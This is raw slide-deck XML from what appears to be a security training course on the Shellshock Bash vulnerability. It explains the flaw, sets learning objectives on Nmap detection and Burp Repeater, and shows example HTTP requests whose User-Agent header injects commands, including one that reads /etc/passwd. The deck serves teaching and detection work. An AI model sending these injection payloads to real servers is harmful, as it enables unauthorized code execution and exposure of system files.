                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> Host: example.com</a:t>
            </a:r>
            <a:endParaRPr>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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> User-Agent: () { :;}; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>echo haxxed</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> Connection: keep-alive</a:t>
            </a:r>
            <a:endParaRPr>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None/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Shellshock is possible because Bash runs code after this no-op function definition. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The attacker won’t actually use the functions defines. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Rather, the attacker will inject malicious code behind it. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2185" name="Google Shape;2185;p118"/>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spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Creating a function means the server interprets the header as shellcode.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Since it doesn’t just read it as a string, it can execute arbitrary code on the target. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2186" name="Google Shape;2186;p118"/>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Shellshock</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2187" name="Google Shape;2187;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8" name="Google Shape;2188;p11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2" name="Shape 2192"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2193" name="Google Shape;2193;p119"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="71616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400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Therefore, attackers can execute arbitrary code on the server, including commands that open TCP connections back to your machine or that show user passwords. </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2194" name="Google Shape;2194;p119"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1651925"/>
            <a:ext cx="6699600" cy="3491400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> GET /index.html HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr>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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> Host: example.com</a:t>
            </a:r>
            <a:endParaRPr>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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> User-Agent: () { :;}; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>bin/bash -c “cat /etc/passwd”</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> Connection: keep-alive</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Shellshock payloads are often executed with the following process:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/bin/bash -c `command`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> runs the string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>`command`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> as a bash command. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/bin/bash -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>helps preserve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> more consistently. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2195" name="Google Shape;2195;p119"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056300" y="910475"/>
            <a:ext cx="1814100" cy="3784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t>In the next activity, </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>we’ll study tools for detecting this vulnerability. </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2196" name="Google Shape;2196;p119"/>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Shellshock</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2197" name="Google Shape;2197;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98" name="Google Shape;2198;p11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2" name="Shape 2202"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2203" name="Google Shape;2203;p12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2204" name="Google Shape;2204;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05" name="Google Shape;2205;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06" name="Google Shape;2206;p12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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Researching Shellshock</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In this activity, you will research </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>CVE-2014-6271</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>, aka Shellshock.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Instructions sent via Slack.  </a:t>
            </a:r>
            <a:endParaRPr sz="1800">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0" name="Shape 2210"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2211" name="Google Shape;221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12" name="Google Shape;2212;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3" name="Google Shape;2213;p121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2502450" y="3571025"/>
            <a:ext cx="4139100" cy="8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990000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Research Shellshock</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mon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5" name="Shape 2035"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2036" name="Google Shape;2036;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37" name="Google Shape;2037;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students will be able to:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2038" name="Google Shape;2038;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39" name="Google Shape;2039;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0" name="Google Shape;2040;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3622200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="914400"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000">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Perform intense scans of target hosts using Zenmap.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Detect specific vulnerabilities, such as shellshock, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>sing Nmap NSE.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Send injection payloads to a vulnerable server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>sing Burp Repeater.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2041" name="Google Shape;2041;p104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="430175" y="1360450"/>
            <a:ext cx="355500" cy="355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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="430175" y="1920240"/>
            <a:ext cx="355500" cy="355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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="430175" y="2450592"/>
            <a:ext cx="355500" cy="355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7" name="Shape 2217"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2218" name="Google Shape;2218;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Researching Shellshock Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2219" name="Google Shape;2219;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Find a tool that determines if a server is vulnerable to Shellshock. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2220" name="Google Shape;2220;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1" name="Google Shape;2221;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5" name="Shape 2225"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2226" name="Google Shape;2226;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Researching Shellshock Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2227" name="Google Shape;2227;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Find a tool that determines if a server is vulnerable to Shellshock. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2228" name="Google Shape;222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29" name="Google Shape;2229;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0" name="Google Shape;2230;p123"/>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highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>http-shellshock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. Example usage below: </a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
